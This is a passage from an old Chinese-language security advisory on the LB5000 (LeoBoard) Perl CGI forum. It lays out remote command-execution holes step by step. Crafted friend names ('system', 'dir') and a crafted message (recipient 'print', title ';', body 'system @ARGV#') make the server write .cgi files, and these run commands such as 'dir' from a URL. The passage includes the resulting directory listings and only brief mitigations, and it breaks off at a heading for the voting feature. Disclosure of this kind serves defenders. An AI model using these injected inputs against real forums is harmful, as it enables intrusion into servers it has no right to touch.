LB5K是国内最流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新版本是LB5000II v1103,可以从http://www.leoboard.com/cgi-bin/lbdown.cgi?ver=LB5000II下载。
)+/
/isg;
if (($inpost eq "")&&($addme eq "")) { $intopictitle.=" (无内容)"; }
$tempintopictitle = $intopictitle;
$tempintopictitle =~ s/ //g;
$tempintopictitle =~ s/\ \;//g;
$tempintopictitle =~ s/ //g;
if ($tempintopictitle eq "") { print header(-charset=>gb2312); &error("发表新主题&主题标题有问题!"); }
undef $tempintopictitle;
显然过滤的太少了!:(
临时解决方法:
* 文章标题和内容应该过滤或者转换某些特殊字符,包括“@”,“#”,“$”,“‘”,“””,“;”等
【加好友功能漏洞】
加好友也有问题?是的!假设当前用户为thiz,我们进入如下URL:
http://www.notfound.org/cgi-bin/friendlist.cgi
增加好友“system”和“dir”,什么?没有该注册用户!你自己不会注册一个?!
然后,我们来看一下:
http://www.notfound.org/cgi-bin/memfriend/thiz.cgi
C:\Inetpub\cgi-bin\memfriend 的目录
2001-11-05 17:54 <DIR> .
2001-11-05 17:54 <DIR> ..
2001-10-31 08:54 204 index.html
2001-11-05 17:54 13 thiz.cgi
2 个文件 217 字节
2 个目录 1,937,965,056 可用字节
临时解决方法:
* 不知道!:(
【发消息功能漏洞】
发消息也是存在安全问题的,利用方法也不难,如果你对Perl比较熟悉的话。
收件人:print
标题:;
内容:system @ARGV#
OK,提交!
假设你当前是用户“thiz”,那么输入下列URL将执行“dir”命令。
http://www.notfound.org/cgi-bin/messages/thiz_out.cgi?dir
C:\Inetpub\cgi-bin\messages 的目录
2001-11-12 15:35 <DIR> .
2001-11-12 15:35 <DIR> ..
2001-10-31 08:54 204 index.html
2001-11-12 15:29 38 print_out.cgi
2 个文件 242 字节
2 个目录 1,854,840,832 可用字节
临时解决方法:
* 过滤或编码标题和内容中的特殊字符,如“;”,“#”等
【投票功能漏洞】